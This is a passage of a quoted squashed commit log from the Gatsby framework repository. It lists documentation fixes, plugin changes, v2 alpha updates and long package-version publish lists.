Signed-off-by: slorber <lorber.sebastien@gmail.com>\n>\n> * upgrade example versions\n>\n> Signed-off-by: slorber <lorber.sebastien@gmail.com>\n>\n> * change name to renderer\n>\n> * Change name to replaceHydrateFunction\n>\n> * document replaceHydrateFunction\n>\n> * fix(gatsby): remove `.js` suffixes in require() to allow transpilation\n> (#5087)\n>\n> In earlier v1, one could write files such as `gatsby-config` in typescript\n> and\n> use babel to transpile the file into js on the fly via\n> `babel-node --presets @babel/preset-typescript --extensions '.ts' gatsby\n> develop`. However, it's no longer possible in recent releases.\n>\n> The reason is that the current implementation put a `.js` suffix on each\n> require(`gatsby-${env}.js`), which blocks `gatsby-{$env}` files being\n> transpiled\n> from other languages via babel. The PR addresses this problem by removing\n> the\n> unnecessary suffix and preserving the integrity.\n>\n> Signed-off-by: Alvis HT Tang <alvis@hilbert.space>\n>\n> * Publish\n>\n>  - gatsby-plugin-google-tagmanager@1.0.18\n>  - gatsby-plugin-sitemap@1.2.23\n>  - gatsby-remark-prismjs@2.0.2\n>  - gatsby-source-drupal@2.0.36\n>  - gatsby-source-filesystem@1.5.34\n>  - gatsby-source-wordpress@2.0.82\n>  - gatsby@1.9.254\n>\n> * stylus plugin tests\n>\n> Signed-off-by: Jan Winterfeld <jan@markenbegeisterung.de>\n>\n> * add learnstorybook.com to showcase\n>\n> * Bump yargs version to get help and version for free by default\n>\n> * Update manifest extension to .webmanifest\n>\n> Reason: https://sonarwhal.com/docs/user-guide/rules/rule-\n> manifest-file-extension/\n>\n> * Updated link to file\n>\n> * team development workflows (#5084)\n>\n> * team development workflows\n>\n> * Small typos\n>\n> * Revert \"Small typos\"\n>\n> This reverts commit ee7bc36c2093ba550280330040f89d771c867b47.\n>\n> * Revert \"team development workflows\"\n>\n> This reverts commit a9e549853e826ef93a96c2b61da4d7fab0883ece.\n>\n> * move doc to blog\n>\n> * excerpt\n>\n> * Publish\n>\n>  - gatsby-cli@1.1.51\n>  - gatsby-plugin-manifest@1.0.21\n>  - gatsby-plugin-stylus@1.1.20\n>  - gatsby@1.9.255\n>\n> * Hyperlinks, optionality, and \"easy\" (#5154)\n>\n> Added a few changes. This document needs to be reorganized eventually; I\n> just want to add these notes in the fastest way possible now so I don't\n> forget them.\n>\n> * Add bartvanderwaerden.com to showcase (#5152)\n>\n> * I guess I found the wrong word... (#5088)\n>\n> I think line 308's `src/pages/my-files.js` is wrong.\n> It should be `src/pages/index.js` isn't it?\n>\n> * Add two missing spaces (minor validation error) (#5150)\n>\n> My previous commit missed adding a space after the backup blank `src=\"\"`\n> and `alt=\"\"` attributes. This causes an HTML validation error when no `alt`\n> value is supplied.\n>\n> This commit simply adds those missing spaces (i.e. `src=\"\" ` and `alt=\"\"\n> `) so there will always be a space between attributes.\n>\n> * Adjust image processing example queries (#5158)\n>\n> * adjust queries to not use id as way to select by filenames\n>\n> this will stop working in gatsby v2\n>\n> * add link to code\n>\n> * Update KaTeX to 0.9.0 (#4712)\n>\n> * Update KaTeX to 0.9.0\n>\n> * Update snapshots\n>\n> * DCO bye-bye (#5165)\n>\n> * source-contentful: Add environment support (#5142)\n>\n> * source-contentful: Add environment support\n>\n> * fix lint\n>\n> * fix default locale logix\n>\n> * log error\n>\n> * Update lock file\n>\n> * Ulog the error\n>\n> * Update package-lock.json\n>\n> * revert lock changes, test shrinkwrap\n>\n> * remove shrinkwrap, it's unused after all, add yarn resolutions\n>\n> * cleanup debug console logs\n>\n> * Link an example that uses gatsby-transformer-json (#5169)\n>\n> * Publish\n>\n>  - gatsby-image@1.0.48\n>  - gatsby-remark-katex@1.0.14\n>  - gatsby-source-contentful@1.3.48\n>  - gatsby-transformer-json@1.0.17\n>\n> * Update RNW plugin and example (#5174)\n>\n> * Update RNW example to use new plugin version\n>\n> Signed-off-by: slorber <lorber.sebastien@gmail.com>\n>\n> * Update React in example\n>\n> Signed-off-by: slorber <lorber.sebastien@gmail.com>\n>\n> * Enhance RNW example\n>\n> Signed-off-by: slorber <lorber.sebastien@gmail.com>\n>\n> * Add link to online demo\n>\n> Signed-off-by: slorber <lorber.sebastien@gmail.com>\n>\n> * Add screenshot\n>\n> Signed-off-by: slorber <lorber.sebastien@gmail.com>\n>\n> * Update createRemoteFileNode documentation (#5171)\n>\n> * Update createRemoteFileNode documentation\n>\n> * Update README.md\n>\n> * Fix replaceHydrateFunction doc (#5175)\n>\n> * Fix replaceHydrateFunction doc\n>\n> * Add spaces\n>\n> * Update \"how gatsby works\" documentation (#243) (#5181)\n>\n> * Add a note about CNAME file in `static`\n>\n> * Fix typo in the .eslintrc file (#5173)\n>\n> * added my site (#5172)\n>\n> * Added rafael.do (#5199)\n>\n> * Add Eviction Free NYC blog post and link to site (#5159)\n>\n> * Add evictionfreenyc.org to showcase\n>\n> * Add Eviction Free NYC blog post\n>\n> * Fixing a typo\n>\n> * Copy edits\n>\n> * Self-contained images\n>\n> * [Ready 4 Review] SQIP - Vectorized primitive image previews (#4205)\n>\n> * first working version with Contentful assets only\n>\n> * add readme\n>\n> * respect width, height, aspect ratio, cropping, resize focus and\n> background\n>\n> * add support for gatsby-transformer-sharp\n>\n> * integrate in gatsbygram\n>\n> * avoid useless regeneration cus contentDigest changes\n>\n> * proper way to get absolute path to ImageSharp nodes\n>\n> * queue preview generation and cache results on disk\n>\n> * upgrade to latest node-sqip to get rid of the GoLang dependency\n>\n> * replace custom svg data uri function with package\n>\n> * prepare images via sharp plugin and allow sharp transformations\n>\n> * load cached svg properly from disk\n>\n> * fix queue resolving to early\n>\n> * set contentful images to 400px\n>\n> * implement new sharp transformation awareness feature\n>\n> * WIP - extract generation and write first pseudo test\n>\n> * fix styling for gatsbygram post detail\n>\n> * finalize unit tests for actual sqip implementation\n>\n> * use 256px input image width to match sqip/primitive default\n>\n> * add using-sqip example page\n>\n> * some cleanup\n>\n> * clean up example and enhance polaroid effect\n>\n> * fix using-sqip dependency\n>\n> * remove base64 since it was not implemented and is bad for compression\n>\n> * remove sqip from gatsbygram example\n>\n> * simplify tests\n>\n> * Small change to trigger build\n>\n> * Publish\n>\n>  - gatsby-plugin-sharp@1.6.44\n>  - gatsby-remark-images@1.5.63\n>  - gatsby-source-drupal@2.0.37\n>  - gatsby-source-filesystem@1.5.35\n>  - gatsby-source-wordpress@2.0.83\n>  - gatsby-transformer-sharp@1.6.24\n>  - gatsby-transformer-sqip@0.0.2\n>  - gatsby@1.9.256\n>\n> * Add tutorial on creating a source plugin\n>\n> * Format\n>\n> * Add extensions to .eslintrc (#5206)\n>\n> - Add .json or .yaml extension to .eslintrc files\n>\n> ```shell\n> $ cd ./packages\n> $ rename 's/.eslintrc/.eslintrc.yaml/' `find . -name .eslintrc`\n> $ cd ../\n> $ rename 's/.eslintrc/.eslintrc.json/' `find . -name .eslintrc`\n> ```\n>\n> - Tweak plopfile.js to add .json extension to examples to be generated\n>\n> Signed-off-by: Masato Ohba <over.rye@gmail.com>\n>\n> * Add gatsby-starter-bulma-storybook to the starters list (#5208)\n>\n> Signed-off-by: Gianni Valdambrini <aleister@develer.com>\n>\n> * fix: style and typo correction\n>\n> - Minor style tweaks (e.g. unlinked \"pixabay.com\" => \"Pixabay\")\n> - Typo patrol\n> - De-British some of the language (my apologies to the letter U)\n>\n> * Toodle-pip British u\n>\n> * Adjust heading hierarchy\n>\n> * Use relative urls for gatsbyjs.org links\n>\n> * Pull last few sections up a level\n>\n> * Minor edits and consistency tweaks\n>\n> * Cleanup example for the createPages API (#5216)\n>\n> * Update with @shannonbux's edits\n>\n> * Additional header\n>\n> * Bumps gatsby-plugin-mailchimp to 2.2.2 bc we updated its API to be more\n> user friendly (#5215)\n>\n> * Add YAML data file for site showcase (#5227)\n>\n> * Publish\n>\n>  - gatsby-image@1.0.49\n>  - gatsby-link@1.6.42\n>  - gatsby-plugin-catch-links@1.0.20\n>  - gatsby-plugin-styletron@2.0.7\n>  - gatsby-react-router-scroll@1.0.15\n>  - gatsby@1.9.257\n>\n> * Update to Gitlab pages deploy (#5243)\n>\n> * Update to Gitlab pages deploy\n>\n> Gitlab pages now include a Gatsby template for CI, which makes it a lot\n> easier to add. Have updated the documentation to reflect this.\n>\n> * Edit\n>\n> * Update README.md (#5247)\n>\n> Adding explanation about available option `offsetY` to solve issue #5061\n> Signed-off-by: Robin Cussol <me@robincussol.com>\n>\n> * [gatsby-source-contentful] Fix storing new sync token (#5252)\n>\n> * Add https://emoji.tinder.com/ to showcase (#5257)\n>\n> * Fix typo (#5241)\n>\n> * Link to website in contributing.md (#5249)\n>\n> * Publish\n>\n>  - gatsby-remark-autolink-headers@1.4.18\n>  - gatsby-source-contentful@1.3.49\n>  - gatsby-source-wordpress@2.0.84\n>\n> * Bump versions of packages that failed to publish earlier\n>\n> * Publish\n>\n>  - gatsby-image@1.0.51\n>  - gatsby-link@1.6.44\n>  - gatsby-plugin-catch-links@1.0.22\n>  - gatsby-plugin-styletron@2.0.9\n>  - gatsby-react-router-scroll@1.0.17\n>  - gatsby@1.9.259\n>\n> * Add top padding for tablet masthead (#5266)\n>\n> * wordpress-source-plugin-tutorial (#5235)\n>\n> * wordpress-source-plugin-tutorial\n>\n> Not sure if I got all the code samples formatted correctly.\n>\n> Still need to edit the index.js page so the <p> tags don't render!!\n>\n> Then, need a screenshot of the final result without <p> tags!\n>\n> * removed unnecessary backticks and corrected link to Part 7 of tutorial\n>\n> * Make links relative\n>\n> * Use graphql for syntax highlighting + minor copy edits\n>\n> * Image Tutorial (#5236)\n>\n> * Image Tutorial\n>\n> Would be nice to add a screenshot of the finished result.\n>\n> Eventually, a really cool image tutorial could include GIFs.\n>\n> * Remove unneeded backticks around code\n>\n> * Add example gif\n>\n> * Fix image links\n>\n> * added Gatsbygram link, fixed assumption spelling\n>\n> * we --> you\n>\n> * Added some more edits of my own\n>\n> wasn't sure whether you wanted lines 153-155 to stay the same\n>\n> * Changed back to previous lines 149-159\n>\n> I accidentally deleted necessary stuff in my previous commit, so I'm just\n> starting over\n>\n> * Edited comments per Mike's suggestions\n>\n> * Small tweaks\n>\n> * Add site (#5268)\n>\n> * readme: Add aQuICK QC landing page site\n>\n> * readme: Kill old event specific page\n>\n> * Quick fix for wordpress source plugin tutorial (#5276)\n>\n> Fragments don't work on Graphiql\n>\n> * Minor fix on wordpress source plugin tutorial (#5277)\n>\n> removed typo\n>\n> * Update wordpress-source-plugin-tutorial.md (#5278)\n>\n> * add missing underscore to graphiql URL (#5275)\n>\n> * add missing underscore to graphiql\n>\n> * Update image-tutorial.md\n>\n> * Update wordpress-source-plugin-tutorial.md (#5279)\n>\n> * Update image-tutorial.md (#5281)\n>\n> * Update source-plugin-tutorial.md (#5283)\n>\n> * add missing .npmignore and .babelrc to sqip transformer (#5282)\n>\n> * Publish\n>\n>  - gatsby-transformer-sqip@0.0.3\n>\n> * Fix typos in source-plugin-tutorial (#5284)\n>\n> * Add workshop-in-the-woods.com to the showcase (#5291)\n>\n> * Update README.md (#5288)\n>\n> * Update README.md\n>\n> Missing curly bracket\n>\n> * formatting\n>\n> * Fix doc typo (#5294)\n>\n> *  fix: chang the url of blog in readme :bug: (#5302)\n>\n> * feat: :sparkles: add gatsby-new-blog plugin\n>\n> * docs: update showcase :memo:\n>\n> * flag importance of plugin order for prism-js vs embed-snippet (#5313)\n>\n> If gatsby-remark-prism-js is declared before gatsby-remark-embed-snippet,\n> the latter will not pick up the `embed:example.js` syntax because it is\n> looking for an inline-code node and it will have been transformed into a p\n> node by gatsby-remark-prism-js. This needs to be noted as this is far from\n> obvious.\n>\n> * Add manifest.webmanifest to staticFileGlobs (#5300)\n>\n> Signed-off-by: Kaue Machado <kaumac@gmail.com>\n>\n> * Publish\n>\n>  - gatsby-plugin-offline@1.0.16\n>  - gatsby-remark-embed-snippet@1.0.22\n>  - gatsby-source-contentful@1.3.50\n>\n> * Fix post path comment (#5295)\n>\n> * Fix post path\n>\n> * Fix\n>\n> * Expand docs for custom components (#5315)\n>\n> * Expand docs for custom components\n>\n> The docs for custom components only mention defining custom components in\n> the markdown, but don't address one of the most useful aspects - that you\n> can map generic markdown tags/elements to your own components. I've\n> expanded the docs to point this out and added a simple example.\n>\n> * Typo\n>\n> * plugin-feed: Note feed xml file is production only (#5305)\n>\n> Add note that the rss.xml feed is only generated in production.\n>\n> * Fixing grammar around CSS Modules (#5286)\n>\n> * Fix broken link to tutorial for building blog (#5273)\n>\n> I don't know if it's the original article but at least it looks fairly\n> similar\n>\n> * added develop command options to use custom key and certs (#5056)\n>\n> * added develop command options to use custom key and certs\n>\n> * fixed typos in doc\n>\n> * added condition to make sure both --key-file and --cert-file are present\n>\n> * - passing https flag results in automatic https certs [devcert]\n> - --cert-file, --key-file, and --https flags can be used together for\n> custom ssl\n> - if all flags needed for custom ssl are not present an error is displayed\n> to the user\n> - if provided --cert-file and --key-file paths are not real files, node\n> gives a rejection\n> - modified docs to express current behavior\n>\n> * Add portfolio to the created with gatsby section (#5331)\n>\n> * Documentation for images in page components #3380 (#4191)\n>\n> * adding first draft\n>\n> * adding info about fragments\n>\n> * cleaning up language\n>\n> * renaming file, this commit is for issue #3380\n>\n> * technical edits on working with images in gatsby\n>\n> * technical edits on working with images in gatsby\n>\n> * punctuation and verb tense edits\n>\n> * more punctuation and grammar\n>\n> * commas\n>\n> * Add new docs page to sidebar (#5339)\n>\n> * New issue, feature and question template (#5274)\n>\n> * Basic template for new issues\n>\n> * updated issue template\n>\n> * updated issue template\n>\n> * Update ISSUE_TEMPLATE.md\n>\n> * Update ISSUE_TEMPLATE.md\n>\n> * changed bug report to the new GitHub issue template\n>\n> * add feature request template\n>\n> * question template\n>\n> * fixed title of question and added emojis\n>\n> * added RFC to question template\n>\n> * Update bug_report.md\n>\n> * Update feature_request.md\n>\n> * Update question.md\n>\n> * Typo\n>\n> * Update custom-html.md (#5341)\n>\n> * Update custom-html.md\n>\n> grammar corrections\n>\n> * Revert one change\n>\n> * Actually revert that one change\n>\n> * add plugin option examples (#5345)\n>\n> add plugin option examples\n>\n> * Remove workshop banner now that workshops have finished (#5338)\n>\n> * Update url-loader (#5342)\n>\n> * Update plugins.md\n>\n> * [gatsby-source-contentful]: Add fallback locale support (#5328)\n>\n> * Add fallback locale support\n>\n> * Fix linting\n>\n> * test: Fix test\n>\n> * Publish\n>\n>  - gatsby-cli@1.1.52\n>  - gatsby-plugin-feed@1.3.22\n>  - gatsby-source-contentful@1.3.51\n>  - gatsby-transformer-remark@1.7.41\n>  - gatsby@1.9.260\n>\n> * [gatsby-source-wordpress] check if parent exists (#5373)\n>\n> * [gatsby-source-filesystem] add fs error handling, bump got retry attemps\n> count (#5375)\n>\n> * [gatsby-source-filesystem] catch fs stream errors\n>\n> * [gatsby-source-filesystem] bump got retries from default 2 to 5\n>\n> * normalize reject payload\n>\n> * Add context to query-runner error log (#5214)\n>\n> * [www] Prevent image twitching in Chrome when hovering a blog index card\n> (#5396)\n>\n> * [gatsby-transformer-yaml] Update docs: GraphQL query mismatch (#5402)\n>\n> GraphQL query references \"value\" when it should actually reference\n> \"character\" as per the example output.\n>\n> * [gatsby-transformer-json] Update docs: outdated Readme examples (#5403)\n>\n> `{ internal: { type } }` exists but it would actually be \"LettersJson\"\n> (according to my GraphiQL checks).\n> Seems better to just remove this, so it at least has parity with\n> gatsby-transformer-yaml readme.\n>\n> * Add \"Six Reasons I Chose Gatsby\" blog post (#5369)\n>\n> * added  \"Six Reasons I Chose Gatsby\" blog post\n>\n> * added site to showcase\n>\n> * updated content based on review comments\n>\n> * updated Gatsby links to be relative\n>\n> * Fix for IE10 not loading scripts (#5404)\n>\n> * Fix for IE10 not loading scripts\n>\n> * Fixed duplicate declaration.\n>\n> * Update example config for netlify-cms (#5405)\n>\n> Added the public_folder attribute to make the assets accessible.\n>\n> Also added the body field to the collection, so the html attribute of\n> markdownRemark gets filled properly. Figuring out that the field has to be\n> named \"body\" was a bit cumbersome.\n>\n> https://www.netlifycms.org/docs/configuration-options/#fields\n>\n> * Fix regression with prefix paths and gatsby-plugin-manifest (#5406)\n>\n> as per https://github.com/gatsbyjs/gatsby/commit/\n> 69ca24750ecba8945a57f2c662cc5ca44964d76a#diff-\n> 079fdad4111264c646208511aa18a321 manifest.webmanifest should start with /\n>\n> it just works (tm) when your site is flat, but when your pages are in sub\n> directory and prefixed, its assumes your manifest files are in the\n> subdirectory, not the root of your site (which might be prefixed).\n>\n> Fixing reversion\n>\n> * Remove old comment (#5407)\n>\n> Code changed in #5404, this comment no longer relevant.\n>\n> * Add gatsby-starter-modern (#5427)\n>\n> * Publish\n>\n>  - gatsby-plugin-manifest@1.0.22\n>  - gatsby-source-drupal@2.0.38\n>  - gatsby-source-filesystem@1.5.36\n>  - gatsby-source-wordpress@2.0.85\n>  - gatsby-transformer-json@1.0.18\n>  - gatsby-transformer-yaml@1.5.17\n>  - gatsby@1.9.261\n>\n> * Mention in building apps docs page that we use React Router under the\n> hood (#5439)\n>\n> * Add a how to add search to your website section (#5272)\n>\n> * Add a how to add search to your website section\n>\n> * Update adding-search.md\n>\n> * Update doc-links.yaml\n>\n> * Update adding-search.md\n>\n> * Better restructuring\n>\n> * Update doc-links.yaml\n>\n> * Update adding-search.md\n>\n> * Address Changes\n>\n> * Rewrite docs\n>\n> * Add the link before the links to stub articles\n>\n> The ones ending with * are stubs\n>\n> * Tidy up\n>\n> * Grammar/punctuation edits and some wording edits\n>\n> * Adding Headers\n>\n> * Edits\n>\n> * More headings\n>\n> * Minor edits\n>\n> * Update adding-search.md (#5448)\n>\n> * regenerate yarn.lock\n>\n> * temporarily disable stylus tests - need to update both tests and example\n> sites to v2\n>\n> * fix wrong conflict resolution\n>\n> * [v2] update using-stylus example and re-add tests to stylus plugin\n> (#5461)\n>\n> * update stylus tests\n>\n> * update using-stylus example\n>\n> * specify eslint rule we want to disable\n>\n> * format\n>\n> * fix merge conflict remnant\n>\n> * Removed unneeded imports causing no-unused-vars lint errors (#5463)\n>\n> * Add stricter check for `Error:` and placeholder test (#5460)\n>\n> * Publish\n>\n>  - gatsby-cli@1.1.41-8\n>  - gatsby-image@1.0.42-8\n>  - gatsby-link@1.6.38-10\n>  - gatsby-plugin-catch-links@2.0.1-9\n>  - gatsby-plugin-feed@1.3.19-9\n>  - gatsby-plugin-google-tagmanager@1.0.15-9\n>  - gatsby-plugin-manifest@2.0.1-13\n>  - gatsby-plugin-offline@2.0.0-alpha.12\n>  - gatsby-plugin-sharp@2.0.0-alpha.16\n>  - gatsby-plugin-sitemap@1.2.14-8\n>  - gatsby-plugin-styletron@1.0.13-9\n>  - gatsby-plugin-stylus@1.1.16-10\n>  - gatsby-react-router-scroll@1.0.12-8\n>  - gatsby-remark-autolink-headers@1.4.13-9\n>  - gatsby-remark-embed-snippet@1.0.10-10\n>  - gatsby-remark-prismjs@1.2.16-9\n>  - gatsby-source-contentful@2.0.0-alpha.15\n>  - gatsby-source-filesystem@2.0.0-alpha.13\n>  - gatsby-source-wordpress@2.0.57-12\n>  - gatsby-transformer-json@2.0.1-9\n>  - gatsby-transformer-remark@2.0.1-11\n>  - gatsby-transformer-sharp@2.0.1-9\n>  - gatsby-transformer-sqip@0.0.4-0\n>  - gatsby-transformer-yaml@2.0.1-9\n>  - gatsby@2.0.0-alpha.39\n>\n> * [v2][www] Move layout to components folder + import Link from gatsby\n> (#5472)\n>\n> * Move layout to components folder and rename its import to be consistent\n>\n> * Import Link from gatsby instead of gatsby-link\n>\n> * Add preload links to end of headComponents list (#5490)\n>\n> * Publish\n>\n>  - gatsby@2.0.0-alpha.40\n>\n> * Don't infer types for plugin provided GQL types\n>\n> * Update screenshot plugin for Gatsby v2 (#5502)\n>\n> * Publish\n>\n>  - gatsby-transformer-screenshot@1.0.3-9\n>\n> * Simpler bundle and data loading (#5535)\n>\n> * Publish\n>\n>  - gatsby@2.0.0-alpha.41\n>\n> * [v2] [gatsby-plugin-offline] get exact filenames for js staticFileGlob\n> (#5511)\n>\n> * [gatsby-plugin-offline] extract exact filenames for js chunks for app\n> and offline app shell\n>\n> * format\n>\n> * Don't inline webpack-runtime as this prevents the service worker from\n> correctly updating to new version of the site (#5540)\n>\n> * Publish\n>\n>  - gatsby-plugin-offline@2.0.0-alpha.13\n>  - gatsby@2.0.0-alpha.42\n>\n> * [v2][www] Fix remaining lint errors (#5568)\n>\n> * fix: `default-case` lint errors\n>\n> * fix: `eqeqeq` lint error\n>\n> * fix: `array-callback-return` lint error\n>\n> * fix: `no-unused-vars` lint error\n>\n> * fix: `alt-text` lint error\n>\n> * Fix missing blog posts (#5539) (#5551)\n>\n> Quick fix for: https://github.com/gatsbyjs/gatsby/issues/5348#\n> issuecomment-391682881\n>\n> * Add a valid entry point for the `gatsby` package (#5481)\n>\n> * Fix outdated babel-code-frame import to use @babel/code-frame (#5585)\n>\n> Fix #5584\n>\n> Signed-off-by: Helder S Ribeiro <hsribei.pub@gmail.com>\n>\n> * [v2] image processing example (#5589)\n>\n> * Upgrade to use gatsby v2 and fix eslint warnings\n>\n> * Fix up fonts on production build\n>\n> * Add back `replaceComponentRenderer` API (#5600)\n>\n> also fix bad merge on lifecycles\n>\n> * Publish\n>\n>  - gatsby-cli@1.1.41-9\n>  - gatsby@2.0.0-alpha.43\n>\n> * Update Contentful example site for Gatsby v2 (#5606)\n>\n> * delete stray console.log\n>\n> * Update babel to 7.0.0-beta.49\n>\n> * Update yarn.lock\n>\n> * [v2] responsive image types (#5250)\n>\n> * Change image type names from resolutions to fixed\n>\n> resolutions resolutions resolutions\n> fixed fixed fixed fixed fixed fixed\n>\n> * Change image type names from sizes to fluid\n>\n> sizes sizes sizes sizes\n> fluid fluid fluid fluid\n>\n> * Continue renaming sizes to fluid\n>\n> * eslint\n>\n> * Include sizes as part of a fluid node\n>\n> * Update snapshots\n>\n> * Update resolver\n>\n> * Remove references to responsiveResolution and responsiveSizes\n>\n> * Rename GraphQL node types for gatsby-transformer-sharp\n>\n> * Rename GraphQL node types for gatsby-source-contentful\n>\n> * Update image-processing example\n>\n> * fluid() should still return a sizes property\n>\n> * Use unique type names\n>\n> * Fix duplicate deprecation messages\n>\n> * Publish\n>\n>  - gatsby-image@1.0.42-9\n>  - gatsby-plugin-manifest@2.0.1-14\n>  - gatsby-plugin-sharp@2.0.0-alpha.17\n>  - gatsby-remark-images@2.0.0-alpha.18\n>  - gatsby-source-contentful@2.0.0-alpha.16\n>  - gatsby-source-wordpress@2.0.57-13\n>  - gatsby-transformer-sharp@2.0.1-10\n>  - gatsby@2.0.0-alpha.44\n>\n> * [v2] mime dependencies (#5602)\n>\n> * Recreate lockfile\n>\n> * Update dependencies that depend on mime\n>\n> * Move less to a peer dependency\n>\n> * Move node-sass to a peer dependency\n>\n> * Update lockfile\n>\n> * Update README.md\n>\n> * Include node-sass in the sass example site\n>\n> * [v2][www] Abstracted sidebar to layout component (#5537)\n>\n> * Abstracted sidebar to layout component\n>\n> * Hide sidebar on mobile\n>\n> * [v2] Bump gatsby-image version as #5250 is a breaking change for it\n> (#5627)\n>\n> * Publish\n>\n>  - gatsby-image@1.0.42-9\n>  - gatsby-plugin-manifest@2.0.1-14\n>  - gatsby-plugin-sharp@2.0.0-alpha.17\n>  - gatsby-remark-images@2.0.0-alpha.18\n>  - gatsby-source-contentful@2.0.0-alpha.16\n>  - gatsby-source-wordpress@2.0.57-13\n>  - gatsby-transformer-sharp@2.0.1-10\n>  - gatsby@2.0.0-alpha.44\n>\n> * [v2] Bump gatsby-image version as #5250 is a breaking change for it\n>\n> * [v2][www] Move YAML link files to data (#5567)\n>\n> * Move YAML link files to data\n>\n> * Organize sidebar links to a subdirectory of data\n>\n> * Publish\n>\n>  - babel-plugin-remove-graphql-queries@2.0.1-8\n>  - gatsby-1-config-css-modules@1.0.10-10\n>  - gatsby-1-config-extract-plugin@1.0.4-5\n>  - gatsby-cli@1.1.41-10\n>  - gatsby-dev-cli@1.2.12-7\n>  - gatsby-image@2.0.0-alpha.2\n>  - gatsby-link@1.6.38-11\n>  - gatsby-plugin-canonical-urls@1.0.14-9\n>  - gatsby-plugin-catch-links@2.0.1-10\n>  - gatsby-plugin-coffeescript@2.0.0-alpha.12\n>  - gatsby-plugin-create-client-paths@1.0.6-8\n>  - gatsby-plugin-emotion@2.0.0-alpha.9\n>  - gatsby-plugin-facebook-analytics@1.0.4-6\n>  - gatsby-plugin-feed@1.3.19-10\n>  - gatsby-plugin-fullstory@1.0.4-6\n>  - gatsby-plugin-glamor@2.0.0-alpha.12\n>  - gatsby-plugin-google-analytics@1.0.20-9\n>  - gatsby-plugin-google-tagmanager@1.0.15-10\n>  - gatsby-plugin-guess-js@1.0.0-alpha.7\n>  - gatsby-plugin-jss@2.0.1-9\n>  - gatsby-plugin-less@2.0.0-alpha.14\n>  - gatsby-plugin-lodash@3.0.0-alpha.11\n>  - gatsby-plugin-manifest@2.0.1-15\n>  - gatsby-plugin-netlify-cms@1.0.8-10\n>  - gatsby-plugin-netlify@1.0.19-10\n>  - gatsby-plugin-nprogress@2.0.0-alpha.11\n>  - gatsby-plugin-offline@2.0.0-alpha.14\n>  - gatsby-plugin-preact@2.0.1-10\n>  - gatsby-plugin-react-css-modules@2.0.0-alpha.11\n>  - gatsby-plugin-react-helmet@2.0.12-6\n>  - gatsby-plugin-react-next@2.0.1-10\n>  - gatsby-plugin-remove-trailing-slashes@1.0.6-8\n>  - gatsby-plugin-sass@2.0.0-alpha.14\n>  - gatsby-plugin-sharp@2.0.0-alpha.18\n>  - gatsby-plugin-sitemap@1.2.14-9\n>  - gatsby-plugin-styled-components@3.0.0-alpha.6\n>  - gatsby-plugin-styled-jsx@3.0.0-alpha.9\n>  - gatsby-plugin-styletron@1.0.13-10\n>  - gatsby-plugin-stylus@1.1.16-11\n>  - gatsby-plugin-twitter@1.0.18-9\n>  - gatsby-plugin-typescript@1.4.17-10\n>  - gatsby-plugin-typography@2.0.1-10\n>  - gatsby-react-router-scroll@1.0.12-9\n>  - gatsby-remark-autolink-headers@1.4.13-10\n>  - gatsby-remark-code-repls@1.0.10-8\n>  - gatsby-remark-copy-linked-files@1.5.28-9\n>  - gatsby-remark-custom-blocks@1.0.4-10\n>  - gatsby-remark-embed-snippet@1.0.10-11\n>  - gatsby-remark-images@2.0.0-alpha.19\n>  - gatsby-remark-katex@1.0.13-9\n>  - gatsby-remark-prismjs@1.2.16-10\n>  - gatsby-remark-responsive-iframe@1.4.18-9\n>  - gatsby-remark-smartypants@1.4.12-10\n>  - gatsby-source-contentful@2.0.0-alpha.17\n>  - gatsby-source-drupal@2.1.0-alpha.14\n>  - gatsby-source-faker@1.0.3-9\n>  - gatsby-source-filesystem@2.0.0-alpha.14\n>  - gatsby-source-hacker-news@1.0.11-9\n>  - gatsby-source-lever@1.0.9-10\n>  - gatsby-source-medium@1.0.13-9\n>  - gatsby-source-mongodb@1.5.16-9\n>  - gatsby-source-npm-package-search@1.0.9-5\n>  - gatsby-source-wikipedia@1.0.0-alpha.6\n>  - gatsby-source-wordpress@2.0.57-14\n>  - gatsby-transformer-csv@1.3.9-9\n>  - gatsby-transformer-documentationjs@1.4.10-9\n>  - gatsby-transformer-excel@2.0.1-9\n>  - gatsby-transformer-hjson@2.0.1-9\n>  - gatsby-transformer-javascript-frontmatter@1.0.6-8\n>  - gatsby-transformer-javascript-static-exports@2.0.1-9\n>  - gatsby-transformer-json@2.0.1-10\n>  - gatsby-transformer-pdfimages@1.0.6-7\n>  - gatsby-transformer-react-docgen@2.0.1-10\n>  - gatsby-transformer-remark@2.0.1-12\n>  - gatsby-transformer-screenshot@1.0.3-10\n>  - gatsby-transformer-sharp@2.0.1-11\n>  - gatsby-transformer-sqip@0.0.4-1\n>  - gatsby-transformer-toml@2.0.1-9\n>  - gatsby-transformer-xml@1.0.16-6\n>  - gatsby-transformer-yaml@2.0.1-10\n>  - gatsby@2.0.0-alpha.45\n>  - graphql-skip-limit@2.0.0-alpha.6\n>\n> * v1.0.18-9\n>\n> * v1.0.18-10\n>\n> * v2.0.0-alpha.20\n>\n> * revert one change from #5250, this one should use \"sizes\" (it doesn't\n> use sharp transformer) (#5631)\n>\n> * Publish\n>\n>  - gatsby-plugin-manifest@2.0.1-16\n>\n> * [v2][www] Fix missing search sidebar for plugins/packages pages (#5550)\n>\n> * Add react-instantsearch package required by plugins searchbar\n>\n> * Add package searchbar to pages that require them\n>\n> * Rename searchbar to plugin-searchbar\n>\n> * Fix imports sidebar data\n>\n> * Revert upgrade to babel-beta.49\n>\n> * Publish\n>\n>  - babel-plugin-remove-graphql-queries@2.0.1-9\n>  - gatsby-1-config-css-modules@1.0.10-11\n>  - gatsby-1-config-extract-plugin@1.0.4-6\n>  - gatsby-cli@1.1.41-11\n>  - gatsby-dev-cli@1.2.12-8\n>  - gatsby-image@2.0.0-alpha.3\n>  - gatsby-link@1.6.38-12\n>  - gatsby-plugin-canonical-urls@1.0.14-10\n>  - gatsby-plugin-catch-links@2.0.1-11\n>  - gatsby-plugin-coffeescript@2.0.0-alpha.13\n>  - gatsby-plugin-create-client-paths@1.0.6-9\n>  - gatsby-plugin-emotion@2.0.0-alpha.10\n>  - gatsby-plugin-facebook-analytics@1.0.4-7\n>  - gatsby-plugin-feed@1.3.19-11\n>  - gatsby-plugin-fullstory@1.0.4-7\n>  - gatsby-plugin-glamor@2.0.0-alpha.13\n>  - gatsby-plugin-google-analytics@1.0.20-10\n>  - gatsby-plugin-google-tagmanager@1.0.15-11\n>  - gatsby-plugin-guess-js@1.0.0-alpha.8\n>  - gatsby-plugin-jss@2.0.1-10\n>  - gatsby-plugin-less@2.0.0-alpha.15\n>  - gatsby-plugin-lodash@3.0.0-alpha.12\n>  - gatsby-plugin-manifest@2.0.1-17\n>  - gatsby-plugin-netlify-cms@1.0.8-11\n>  